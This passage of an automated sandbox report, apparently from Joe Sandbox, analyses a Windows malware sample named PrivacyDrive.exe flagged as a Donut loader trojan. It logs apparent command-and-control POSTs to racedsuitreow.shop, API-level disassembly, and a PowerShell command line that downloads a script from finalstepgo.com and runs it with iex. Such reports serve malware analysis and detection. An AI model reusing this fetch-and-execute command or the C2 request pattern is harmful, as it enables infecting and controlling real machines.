                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIztV5Bz3t9VVrStP02Wkt7ZZy%2F5utC31aiKKYKK3%2FI1QGRPX5KZgtgieRIXCjiRh1ZNbO26po3Xh9SeaYOfw5unYYRSZsUCg4vYRQUZhDH%2F5HO2BWrDseUPNs4PaphLv9XBSkc%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c9463919a0a0cb4-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-09-26 15:46:49 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                              Data Ascii: aerror #D12
                              2024-09-26 15:46:49 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.449748172.67.206.221443764C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              TimestampBytes transferredDirectionData
                              2024-09-26 15:46:58 UTC265OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8
                              Host: racedsuitreow.shop
                              2024-09-26 15:46:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                              Data Ascii: act=life
                              2024-09-26 15:46:59 UTC551INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:46:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oqu3udVx3jjsSUlPBNEzPJdE0n7XkXmjfe5kAP1zS20bicIuTLoxSY7XuB8z8rcG6905nmS09%2FghKBERNMA87nKh2xOSRylqY60z11EH%2Fp0dt3xDT8FOIQmMEX89P%2B3ZJDrfwlg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c9463cedd8c8c17-EWR
                              2024-09-26 15:46:59 UTC818INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-09-26 15:46:59 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                              Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                              2024-09-26 15:46:59 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 66 77 39 33 6c 79 59 5f 42 4d 45 4a 65 49 4c 6c 6f 6c 4d 33 65 73 30 45 66 55 58 69 38 47 34 39 52 6f 56 48 4d 78 48 75 71 6c 30 2d 31 37 32 37 33 36 35 36 31 39 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74
                              Data Ascii: <input type="hidden" name="atok" value="fw93lyY_BMEJeILlolM3es0EfUXi8G49RoVHMxHuql0-1727365619-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
                              2024-09-26 15:46:59 UTC849INData Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61
                              Data Ascii: m:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
                              2024-09-26 15:46:59 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.449749172.67.206.221443764C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              TimestampBytes transferredDirectionData
                              2024-09-26 15:46:59 UTC355OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Cookie: __cf_mw_byp=fw93lyY_BMEJeILlolM3es0EfUXi8G49RoVHMxHuql0-1727365619-0.0.1.1-/api
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 49
                              Host: racedsuitreow.shop
                              2024-09-26 15:46:59 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 72 75 69 31 32 32 32 26 6a 3d
                              Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--rui1222&j=
                              2024-09-26 15:47:00 UTC774INHTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:47:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=s261jmos7mlc3av1mdsrdi9udo; expires=Mon, 20 Jan 2025 09:33:39 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Im40CtgK9%2FUaHet3NJeXDxA%2BdNrniTmLhHNPdIvD%2FxYHUvMzuKLiYvG5gA8CB6xKKRvVj4AI2D6Ge6ZlbziO0eEco45YL8mp0HQYyjfH25yOTPX5HUV9iy%2BozTkn4AUXIzIcZjo%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c9463d45fb042ca-EWR
                              2024-09-26 15:47:00 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                              Data Ascii: aerror #D12
                              2024-09-26 15:47:00 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:11:46:23
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:1
                              Start time:11:46:23
                              Start date:26/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:11:46:24
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
                              Imagebase:0x960000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:11:46:27
                              Start date:26/09/2024
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Imagebase:0x7ff6eef20000
                              File size:55'320 bytes
                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:4
                              Start time:11:46:36
                              Start date:26/09/2024
                              Path:C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
                              Imagebase:0x400000
                              File size:2'881'672 bytes
                              MD5 hash:80C2A36E9A14E3EDBA0B706D2433D9B8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:8
                              Start time:11:46:47
                              Start date:26/09/2024
                              Path:C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
                              Imagebase:0x400000
                              File size:2'881'672 bytes
                              MD5 hash:80C2A36E9A14E3EDBA0B706D2433D9B8
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:12
                              Start time:11:46:48
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:13
                              Start time:11:46:48
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:15
                              Start time:11:46:50
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:17
                              Start time:11:46:51
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:19
                              Start time:11:46:59
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:0.7%
                                Dynamic/Decrypted Code Coverage:70.4%
                                Signature Coverage:30.7%
                                Total number of Nodes:189
                                Total number of Limit Nodes:32
                                execution_graph 88136 51df5fb 88137 51df60a 88136->88137 88138 51df626 GetVolumeInformationW 88137->88138 88090 505f57 GetLastError 88104 506d0e TlsGetValue 88090->88104 88092 505f6c 88093 505fba SetLastError 88092->88093 88105 506ab7 88092->88105 88097 505f93 88098 505fb1 88097->88098 88099 505f99 88097->88099 88112 50102e 58 API calls 2 library calls 88098->88112 88111 505fc6 58 API calls 3 library calls 88099->88111 88102 505fa1 GetCurrentThreadId 88102->88093 88103 505fb7 88103->88093 88104->88092 88106 506abe 88105->88106 88107 505f7f 88106->88107 88109 506adc 88106->88109 88107->88093 88110 506d2d TlsSetValue 88107->88110 88109->88106 88109->88107 88113 507079 Sleep 88109->88113 88110->88097 88111->88102 88112->88103 88113->88109 88139 f8055f 88140 f8056d 88139->88140 88153 f80eaf 88140->88153 88142 f809f3 88143 f80705 GetPEB 88145 f80782 88143->88145 88144 f806c0 88144->88142 88144->88143 88156 f80c6f 88145->88156 88148 f807e3 CreateThread 88149 f807bb 88148->88149 88167 f80b1f GetPEB 88148->88167 88149->88142 88165 f8116f GetPEB 88149->88165 88151 f80c6f 5 API calls 88151->88142 88152 f8083d 88152->88142 88152->88151 88154 f80ebc 88153->88154 88166 f80ecf GetPEB 88153->88166 88154->88144 88157 f80c85 CreateToolhelp32Snapshot 88156->88157 88159 f807b5 88157->88159 88160 f80cbc Thread32First 88157->88160 88159->88148 88159->88149 88161 f80d78 CloseHandle 88160->88161 88162 f80ce3 88160->88162 88161->88159 88162->88161 88163 f80d1a Wow64SuspendThread 88162->88163 88164 f80d44 CloseHandle 88162->88164 88163->88164 88164->88162 88165->88152 88166->88154 88170 f80b78 88167->88170 88168 f80bd8 CreateThread 88168->88170 88171 f8134f 88168->88171 88169 f80c25 88170->88168 88170->88169 88172 f81354 88171->88172 88174 f8135d 88172->88174 88175 f81365 88174->88175 88178 fdab3a 88175->88178 88179 fdab5f 88178->88179 88180 fdac49 88178->88180 88211 fdd420 88179->88211 88190 fdbe45 88180->88190 88183 fdab77 88184 fdd420 LoadLibraryA 88183->88184 88189 f8137a 88183->88189 88185 fdabb9 88184->88185 88186 fdd420 LoadLibraryA 88185->88186 88187 fdabd5 88186->88187 88188 fdd420 LoadLibraryA 88187->88188 88188->88189 88189->88172 88191 fdd420 LoadLibraryA 88190->88191 88192 fdbe68 88191->88192 88193 fdd420 LoadLibraryA 88192->88193 88194 fdbe80 88193->88194 88195 fdd420 LoadLibraryA 88194->88195 88196 fdbe9e 88195->88196 88197 fdbeb3 VirtualAlloc 88196->88197 88209 fdbec6 88196->88209 88199 fdbee0 88197->88199 88197->88209 88198 fdd420 LoadLibraryA 88200 fdbf5e 88198->88200 88199->88198 88199->88209 88203 fdbfb4 88200->88203 88200->88209 88215 fdd227 88200->88215 88201 fdd420 LoadLibraryA 88201->88203 88203->88201 88204 fdc00c 88203->88204 88203->88209 88204->88209 88210 fdc06d 88204->88210 88241 fdafd3 LoadLibraryA 88204->88241 88206 fdc055 88206->88209 88242 fdb0ce LoadLibraryA 88206->88242 88209->88189 88210->88209 88219 fdc583 88210->88219 88212 fdd437 88211->88212 88213 fdd45e 88212->88213 88246 fdb4ef LoadLibraryA 88212->88246 88213->88183 88216 fdd23c 88215->88216 88217 fdd2b2 LoadLibraryA 88216->88217 88218 fdd2bc 88216->88218 88217->88218 88218->88200 88220 fdc5bf 88219->88220 88221 fdc62c NtCreateSection 88220->88221 88222 fdc651 88220->88222 88240 fdcc5b 88220->88240 88221->88222 88221->88240 88223 fdc6ea NtMapViewOfSection 88222->88223 88222->88240 88231 fdc70a 88223->88231 88224 fdca2e VirtualAlloc 88233 fdca6e 88224->88233 88225 fdd227 LoadLibraryA 88225->88231 88226 fdd227 LoadLibraryA 88230 fdc97c 88226->88230 88227 fdcb1d VirtualProtect 88229 fdcbed VirtualProtect 88227->88229 88236 fdcb42 88227->88236 88228 fdca2a 88228->88224 88234 fdcc1e 88229->88234 88230->88224 88230->88226 88230->88228 88244 fdd2c5 LoadLibraryA 88230->88244 88231->88225 88231->88230 88231->88240 88243 fdd2c5 LoadLibraryA 88231->88243 88233->88227 88238 fdcb0a NtMapViewOfSection 88233->88238 88233->88240 88234->88240 88245 fdcfda LoadLibraryA 88234->88245 88236->88229 88239 fdcbc4 VirtualProtect 88236->88239 88238->88227 88238->88240 88239->88236 88240->88209 88241->88206 88242->88210 88243->88231 88244->88230 88245->88240 88246->88212 88247 51e3176 88248 51e31c6 RtlFreeHeap 88247->88248 88249 51e3194 88247->88249 88249->88248 88250 51b2631 CoInitializeSecurity 88251 534afe 88252 534b09 88251->88252 88253 534b1c 88251->88253 88282 50524c 58 API calls __getptd_noexit 88252->88282 88261 534a3a 88253->88261 88256 534b0e 88283 503773 9 API calls wcstoxl 88256->88283 88257 534b2c 88259 534b18 88257->88259 88284 50524c 58 API calls __getptd_noexit 88257->88284 88264 534a46 __initptd 88261->88264 88262 534a58 88293 50524c 58 API calls __getptd_noexit 88262->88293 88264->88262 88266 534a85 88264->88266 88265 534a5d 88294 503773 9 API calls wcstoxl 88265->88294 88285 535751 61 API calls 5 library calls 88266->88285 88269 534a8a 88270 534a93 88269->88270 88271 534aa0 88269->88271 88295 50524c 58 API calls __getptd_noexit 88270->88295 88272 534ac9 88271->88272 88273 534aa9 88271->88273 88296 535870 58 API calls 3 library calls 88272->88296 88286 50524c 58 API calls __getptd_noexit 88273->88286 88277 534a68 __initptd 88277->88257 88278 534aae 88287 50c4d0 88278->88287 88279 534ad4 88297 534af6 LeaveCriticalSection LeaveCriticalSection _fseek 88279->88297 88282->88256 88283->88259 88284->88259 88285->88269 88286->88278 88290 50c502 88287->88290 88288 50c552 88288->88277 88290->88288 88298 50f974 88290->88298 88304 50f955 LeaveCriticalSection LeaveCriticalSection VirtualAlloc @_EH4_CallFilterFunc@8 __getstream 88290->88304 88293->88265 88294->88277 88295->88277 88296->88279 88297->88277 88299 50f995 @_EH4_CallFilterFunc@8 88298->88299 88300 50ff70 VirtualAlloc 88299->88300 88301 50ffad @_EH4_CallFilterFunc@8 88300->88301 88305 50c9b2 LeaveCriticalSection LeaveCriticalSection _doexit 88301->88305 88303 5102bb 88305->88303 88114 51df113 CoSetProxyBlanket 88306 51df073 88307 51df0ba 88306->88307 88308 51df0e4 SysAllocString 88306->88308 88307->88308 88309 51df107 88308->88309 88310 51dd9ec 88311 51dda1e 88310->88311 88312 51dda80 88311->88312 88314 51e6730 LdrInitializeThunk 88311->88314 88314->88311 88315 51df66b 88316 51df6b4 SysAllocString 88315->88316 88317 51df686 88315->88317 88318 51df764 SysAllocString 88316->88318 88319 51df736 88316->88319 88317->88316 88320 51df780 88318->88320 88319->88318 88320->88320 88115 51ad3c0 88116 51ad3c9 88115->88116 88117 51ad5ae ExitProcess 88116->88117 88118 51ad3d1 GetInputState 88116->88118 88119 51ad3de 88118->88119 88120 51ad5a9 88119->88120 88121 51ad3e6 GetCurrentThreadId GetCurrentProcessId 88119->88121 88128 51e6130 FreeLibrary 88120->88128 88123 51ad41d 88121->88123 88123->88120 88127 51b2610 CoInitialize 88123->88127 88128->88117 88129 51df006 CoCreateInstance 88130 51e3142 RtlAllocateHeap 88131 51e9dc0 88133 51e9de0 88131->88133 88132 51e9efe 88133->88132 88135 51e6730 LdrInitializeThunk 88133->88135 88135->88132 88321 51ea1e0 88323 51ea1ff 88321->88323 88322 51ea30e 88325 51ea25f 88323->88325 88327 51e6730 LdrInitializeThunk 88323->88327 88325->88322 88328 51e6730 LdrInitializeThunk 88325->88328 88327->88325 88328->88322

                                Executed Functions

                                Function 0050E640 Relevance: 36.9, APIs: 3, Strings: 17, Instructions: 1873librarymemoryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 50e640-5102bc call 4b1144 call 52ba1b call 4d7d21 call 4593c2 call 49bcae call 5249ea call 4f8465 call 4e2efb call 4ebeef call 525a85 call 4036ec call 4abe3e call 448363 call 46a71d call 5291f3 call 447018 call 413548 call 520a49 call 44051a call 4bd628 call 516871 call 4cc508 call 4ab3af call 402ce9 call 479830 call 40d31f call 43a59a call 48dcb9 call 497ca0 call 47b808 call 413753 call 4d1edc call 4a9582 call 4a6411 call 5102bd call 50002c call 51922c call 50a64d call 4b2145 call 42e1fc call 40d646 call 4ab98f call 49893a call 40dcd3 call 50238e call 4e6246 call 41abc4 call 524579 call 48fd28 call 487488 call 444146 call 41d210 call 4da792 call 4f4f4d call 46d6e5 call 4018d3 call 4886e3 call 4f59fb call 4520bd LoadLibraryW call 426132 call 42835b call 4bde24 call 403f35 call 45dd61 call 4dc543 call 46b827 call 4e2efb call 461f77 call 527eea call 4b83bc call 477c39 call 456cfa call 4cfe83 call 4eda0f call 4adda6 call 4f7443 call 4e63c2 call 4fa923 call 4b774d call 48f926 call 46b827 call 4388d8 call 402669 call 490841 call 4af3a9 call 51a96c call 466647 call 4616e9 call 4739c2 call 5102bd call 46e8e8 call 4694c8 call 4e2efb call 445ba8 call 4e1af0 call 4bde24 call 4159d4 call 444c56 call 48b270 call 492a17 call 4eecb1 call 504436 call 49f464 call 49f530 call 46a204 call 4f7be7 call 41437d call 499c9a call 5102bd call 454e5a call 4fca22 call 42b7e8 call 512d6c call 42072b call 4747b0 call 4011f9 call 47bc45 call 487354 GetProcAddress call 45a31c call 5102bd call 40c6f1 call 42a1b6 call 4e0a1b call 51ea40 call 448976 call 4654b2 call 4bae56 call 4a291a call 4f8465 call 47dc6a call 49d761 call 407fff call 437a48 call 4804fc call 4f5469 call 43c850 call 4159d4 call 4ebeef call 4f9c29 call 47575e call 4c6ab2 call 42d85b call 4739c2 call 476def call 453710 call 487d9d call 52ca20 call 4db3b0 call 4a2468 call 515b7e call 44f7f2 call 4c7325 call 47cb5e call 47674c call 4a39c9 call 49f37e call 480d76 call 44463a call 4616e9 call 4d85b7 VirtualAlloc call 40da0f call 443572 call 47ab98 call 4f4985 call 4685a4 call 4230b6 call 443572 call 4b7a2d call 43b794 call 4546db call 4f52d5 call 4ad924 call 49c133 call 405eb0 call 486b07 call 50c9b2
                                APIs
                                • LoadLibraryW.KERNEL32(?,-00000001C816EF8F,-D3472FE1,00000000,?,-37466A7C), ref: 0050EFD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0050F8DC
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressAllocLibraryLoadProcVirtual
                                • String ID: I\$5H\$5V\$=\$=6\$=]\$=h\$!J\$!5v\$!5{\$!=Q\$)=\\$1=7\$3=\$N)5X\$:5$l]
                                • API String ID: 4074058790-3398654432
                                • Opcode ID: 5cf1c075dd1c5804f0484755acad62fd2e52c2f1c2395c0f880e5a8e5b4e3f62
                                • Instruction ID: ee3a7cb5424bd764c10784c3ed0ff581881010bb31c488890e1eaacbe34f7dfd
                                • Opcode Fuzzy Hash: 5cf1c075dd1c5804f0484755acad62fd2e52c2f1c2395c0f880e5a8e5b4e3f62
